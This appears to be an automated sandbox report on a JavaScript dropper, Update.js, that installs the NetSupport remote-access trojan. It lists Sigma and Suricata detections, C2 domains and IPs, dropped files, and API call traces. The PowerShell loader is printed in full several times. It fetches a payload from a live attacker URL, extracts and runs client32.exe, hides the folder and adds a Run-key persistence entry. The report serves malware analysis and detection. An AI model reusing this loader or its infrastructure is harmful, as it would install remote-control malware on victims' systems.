System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 8.39.147.104, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2324, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49718
                                Source: Event Logs, Author: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 2d724c80-327a-44f1-8ea7-aafe971519b2 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; user Version = 5.1.19041.1682 Runspace ID = 24d5feab-35aa-46e9-a0b0-c5acf7616122 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 2d724c80-327a-44f1-8ea7-aafe971519b2 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe'
                                Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 2324, ProcessName: wscript.exe
                                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4196, ProcessName: svchost.exe

                                Remote Access Functionality

                                Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5880, TargetFilename: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\NSM.LIC
                                Timestamp                        SID      Severity  Classtype                                      Source IP    Source Port  Destination IP  Destination Port  Protocol
                                2024-09-10T16:33:38.861236+0200  2055795  1         Exploit Kit Activity Detected                  192.168.2.6  64797        1.1.1.1         53                UDP
                                2024-09-10T16:33:39.408669+0200  2055798  1         Exploit Kit Activity Detected                  192.168.2.6  49718        8.39.147.104    443               TCP
                                2024-09-10T16:33:47.058328+0200  2055801  1         Domain Observed Used for C2 Detected           192.168.2.6  55588        1.1.1.1         53                UDP
                                2024-09-10T16:33:47.624783+0200  2055802  1         Domain Observed Used for C2 Detected           192.168.2.6  49733        79.141.161.172  443               TCP
                                2024-09-10T16:33:31.132514+0200  2827745  1         Malware Command and Control Activity Detected  192.168.2.6  49735        5.181.159.137   443               TCP

                                AV Detection

                                Source: https://ipva2024-detransp.com/data.php?6891, Avira URL Cloud: Label: phishing
                                Source: https://moneymoj.com/cdn-vs/update.php?88, Avira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL, ReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, ReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exe, ReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,11_2_110ADA40
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 13_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,CryptGetProvParam,CryptGetProvParam,GetLastError,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,13_2_110ADA40
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dll
                                Source: unknown, HTTPS traffic detected: 8.39.147.104:443 -> 192.168.2.6:49718 version: TLS 1.2
                                Source: unknown, HTTPS traffic detected: 79.141.161.172:443 -> 192.168.2.6:49733 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 13_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 13_2_111273E0 GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 13_2_110BD520 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,13_2_110BD520
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 13_2_1110F910 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,13_2_1110F910
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 13_2_1110BD70 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 13_2_110663B0 _memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 13_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,13_2_1106ABD0

                                Software Vulnerabilities

                                Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                Source: Network traffic, Suricata IDS: 2055795 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (moneymoj .com) : 192.168.2.6:64797 -> 1.1.1.1:53
                                Source: Network traffic, Suricata IDS: 2055798 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (moneymoj .com) : 192.168.2.6:49718 -> 8.39.147.104:443
                                Source: Network traffic, Suricata IDS: 2055801 - Severity 1 - ET MALWARE ZPHP CnC Domain in DNS Lookup (ipva2024-detransp .com) : 192.168.2.6:55588 -> 1.1.1.1:53
                                Source: Network traffic, Suricata IDS: 2055802 - Severity 1 - ET MALWARE ZPHP CnC Domain in TLS SNI (ipva2024-detransp .com) : 192.168.2.6:49733 -> 79.141.161.172:443
                                Source: Network traffic, Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:49735 -> 5.181.159.137:443
                                Source: C:\Windows\System32\wscript.exe, Network Connect: 8.39.147.104 443
                                Source: Update.js, Return value : ['501988vRAPdm,418iDeVYT,open,send,5YKAWyb,POST,377964dSLjeI,https://moneymoj.com/cdn-vs/update.php?88']
                                Source: Update.js, Return value : ['"send"']
                                Source: global traffic, HTTP traffic detected: GET /data.php?6891 HTTP/1.1 Host: ipva2024-detransp.com Connection: Keep-Alive
                                Source: global traffic, HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                Source: Joe Sandbox View, IP Address: 104.26.1.231
                                Source: Joe Sandbox View, ASN Name: HZ-US-ASBG
                                Source: Joe Sandbox View, ASN Name: MIVOCLOUDMD
                                Source: Joe Sandbox View, ASN Name: CFA-INSTITUTEUS
                                Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: global traffic, HTTP traffic detected: POST /cdn-vs/update.php?88 HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 0 Host: moneymoj.com
                                Source: unknown, TCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global traffic, DNS traffic detected: DNS query: moneymoj.com
                                Source: global traffic, DNS traffic detected: DNS query: ipva2024-detransp.com
                                Source: global traffic, DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknown, HTTP traffic detected: POST /cdn-vs/update.php?88 HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 0 Host: moneymoj.com
                                Source: client32.exe, String found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, String found in binary or memory: http://%s/testpage.htm
                                Source: client32.exe, String found in binary or memory: http://127.0.0.1
                                Source: client32.exe, String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: wscript.exe (memory dumps), String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                                Source: wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156349259.000001D0C871D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://moneymoj.com/cdn-vs/update.php?88
                                Source: wscript.exe (memory dumps), String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
                                Source: wscript.exe (memory dumps), String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
                                Source: wscript.exe (memory dumps), String found in binary or memory: https://www.googleapis.com
                                Source: wscript.exe, 00000000.00000003.2160355900.000001D0C75F5000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.googleapis.comXX2
                                Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
                                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
                                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49718
                                Source: unknown, Network traffic detected: HTTP traffic on port 49718 -> 443
                                Source: unknown, Network traffic detected: HTTP traffic on port 49735 -> 443
                                Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49735
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,11_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Code function: 11_2_110335A0 GetClipboardFormatNameA,SetClipboardData,11_2_110335A0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_110335A0 GetClipboardFormatNameA,SetClipboardData
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
Source: Yara match | File source: 11.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2518228905.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 11_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Code function: 13_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA

                                System Summary

Source: amsi64_2324.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll
